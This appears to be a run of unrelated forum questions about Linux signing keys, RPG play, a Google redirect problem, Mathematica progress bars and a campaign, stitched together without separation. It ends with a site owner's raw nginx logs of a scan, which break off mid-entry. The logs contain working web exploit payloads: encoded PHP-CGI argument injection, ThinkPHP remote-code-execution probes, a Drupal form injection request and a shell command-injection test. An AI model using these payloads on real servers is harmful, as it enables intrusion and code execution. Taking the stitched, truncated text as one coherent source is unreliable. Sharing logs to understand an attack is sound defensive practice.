seems like a wide gaping hole in the process for checking integrity of e.g. linux distro releases

Many Linux distributions recommend using downloaded signing keys to verify the integrity of downloaded checksums. This seems utterly ridiculous to me, since the downloaded keys are just as suspect as the downloaded checksums. And checking key fingerprints is exactly the same thing, i.e. the page with the fingerprints is just another file downloaded by my browser.

Example: https://getfedora.org/en/security/

If I trust the PKI of my browser (assuming https) to authenticate the key or key fingerprints, then I don’t need the signing process in the first place. But of course I DON’T trust the PKI because the list of root certs distributed with major OSes is chock-full of very very dodgy CAs.

At minimum, shouldn’t the keys of a new release be signed with the keys of the previous release? That way you can maintain a chain of integrity.

Given that the same process is used for GPG: https://gnupg.org/signature_key.html I assume I am being a moron and missing something obvious. Can anyone explain?

How can I handle a player who seems to utilize skills their characters don’t have?

Well the tag is slightly misleading as these players do not cause problems. However I have encountered several players who exhibit skills their real life counterpart has without actually metagaming. As an example I encountered a player while running storyteller system and while they didn’t have leadership skill they were quite fond of management stuff and assigned people that were under their command. On a similar note I had a player in D&D 5e who did not have survival proficiency (or nature proficiency for that matter) but he explained how his character set up a rudimentary water purification system.

I thought of a few solutions for this.

  1. Just tell them no. While this solution feels like the correct one my players often get excited when they utilize things like this and I don’t want to be the GM that says ‘No fun allowed’.

  2. Ask them to switch their proficiencies/skills to better reflect their knowledge. This feels a bit too punishing and I feel that it might end up causing them to not have the character they had in mind.

  3. Just let it fly. This is what I have been doing so far but to be honest I feel it is hurting other players and stealing the spotlight from people that invested in the required skills.

The main question is: How can I handle a player who seems to utilize skills their characters don’t have?

google seems not to be the real google

I have a problem with google searches that occasionally point me to sites containing only nonsense. The nasty thing is, it happens only occasionally, like every hour or so of browsing, which made me believe several times I had solved the issue. A redirection of the link always happens but this is not the problem. The link displayed is already dodgy and if I type the found URL directly into the browser, I always get "No Permission". If the response is a URL that I happen to know, then I am always redirected to the correct site.

The problem started during the weekend on my computer and that of my wife and for every browser, Firefox, Chrome, Edge. Mobiles are not affected though. I run Linux (Tumbleweed) and my wife Windows 10.

So I thought it must be my router, ASUS ac68u. Hence I factory reset it, changed the password and installed the newest firmware (well, it did it automatically). But the problem persisted.

I ran a virus scanner on my wife’s Windows 10 and it found nothing. I also set another DNS server on all machines, 8.8.8.8, the only DNS address I remembered from ancient times. But also no luck.

My conclusion is that only google queries are affected (no problem with duckduckgo). But that is not plausible, because the SSH keys would also have to be faked by the attacker. My browser says it’s google when right clicking on the lock.

I really do not know where to look further. Next thing I will probably do is install a fresh OS, which is easy enough on Linux, but on Windows this will be a lot more work.

BTW, everything I install in Linux is from the package manager. I have compiled a few projects from github though.

The first dodgy site I saw was the infamous "You won a price" scam. But all security sites say it is a browser hack. I cannot imagine five browsers have been hacked at the same time on two different operating systems.

Any idea?

ProgressIndicator with Monitor seems to update to 0 and then back to correct number

I am monitoring a large function that reads in filenames, performs operations and saves multiple files to different folders. This works without issue, but I like to be able to monitor in case it stalls at a certain file so that I can check if something is wrong.

    Monitor[
      Table[myfun[filename[[n]]], {n, 1, numfiles}],
      Row[{ProgressIndicator[n, {1, numfiles}],
        ToString[N[100 (n - 1)/numfiles]] <> "%"}, " "]]

For the most part, the progress bar works correctly, but when it initially moves to a new file the n% and progress bar resets to 0%, before getting back to the correct % complete and process. Is there something wrong with how I have used these functions? Thanks.

If campaign seems like ending should I change character

I feel like it might be ending because one of the other players is in jail with no chance of escape, another was recently kicked from the only home she ever knew and is feeling depressed, while another is at death’s door, and I’m stuck in the middle. So which one should I do: quit and make a new character, or should I try to see some good in all of this and try to help all of them at once? If so, how should I go about it? I have no idea how to keep my team together.

There seems to have been an attempt to attack my website

I am using PHP as a server-side language, and I don’t use a CMS or framework. From the nginx log the website attack seems obvious.

I wonder what kind of attack the attacker attempted.

The attacker sent 941 malicious queries over a period of about 5 minutes, some of which are listed below.

— Nginx Log 1 —

[23/Mar/2020:03:24:02 +0000] "POST /Admin06f42d34/Login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:03 +0000] "GET /l.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86" [23/Mar/2020:03:24:04 +0000] "GET /phpinfo.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86" [23/Mar/2020:03:24:05 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86" [23/Mar/2020:03:24:06 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:06 +0000] "POST /bbs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:06 +0000] "POST /forum.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:07 +0000] "POST /forums.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:08 +0000] "POST /bbs/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:08 +0000] "POST /forum/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:08 +0000] "POST /forums/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:09 +0000] "POST 
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86" [23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86" [23/Mar/2020:03:24:11 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 
HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86" [23/Mar/2020:03:24:20 +0000] "POST /%62%61%73%65/%70%6F%73%74%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" "218.75.30.86" [23/Mar/2020:03:24:20 +0000] "GET /webdav/ HTTP/1.1" 301 178 "-" "Mozilla/5.0" "218.75.30.86" [23/Mar/2020:03:24:21 +0000] "GET /%69%73%70%69%72%69%74/%69%6D/%75%70%6C%6F%61%64%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:21 +0000] "GET /help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:22 +0000] "GET /java.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:22 +0000] "GET /_query.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:23 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:23 +0000] "GET /db_cts.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:23 +0000] "GET /db_pma.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /logon.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 
"218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /help-e.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /license.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /log.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:25 +0000] "GET /hell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:25 +0000] "GET /pmd_online.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:25 +0000] "GET /x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:26 +0000] "GET /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:26 +0000] "GET /htdocs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:27 +0000] "GET /b.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:27 +0000] "GET /sane.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 
"218.75.30.86" [23/Mar/2020:03:24:28 +0000] "GET /desktop.ini.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:28 +0000] "GET /z.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:28 +0000] "GET /lala.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:29 +0000] "GET /lala-dpr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 2 —

[23/Mar/2020:03:24:37 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:38 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:38 +0000] "GET /scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /PMA/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:40 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:40 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 3 —

[23/Mar/2020:03:24:41 +0000] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:41 +0000] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:42 +0000] "GET /plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:42 +0000] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:42 +0000] "GET /weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET 
/App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /index.php/module/action/param1/$  {@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:44 +0000] "GET /index.php?s=/module/action/param1/$  {@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:44 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:44 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /Joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /d7.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:46 +0000] "GET /rxr.php HTTP/1.1" 301 
178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:46 +0000] "GET /1x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:46 +0000] "GET /home.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 4 —

[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/modules/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:08 +0000] "POST /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:09 +0000] "POST /data/admin/help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:09 +0000] "POST /12.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "POST /ecmsmod.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:11 +0000] "GET /solr/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:12 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" "218.75.30.86" [23/Mar/2020:03:29:12 +0000] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 
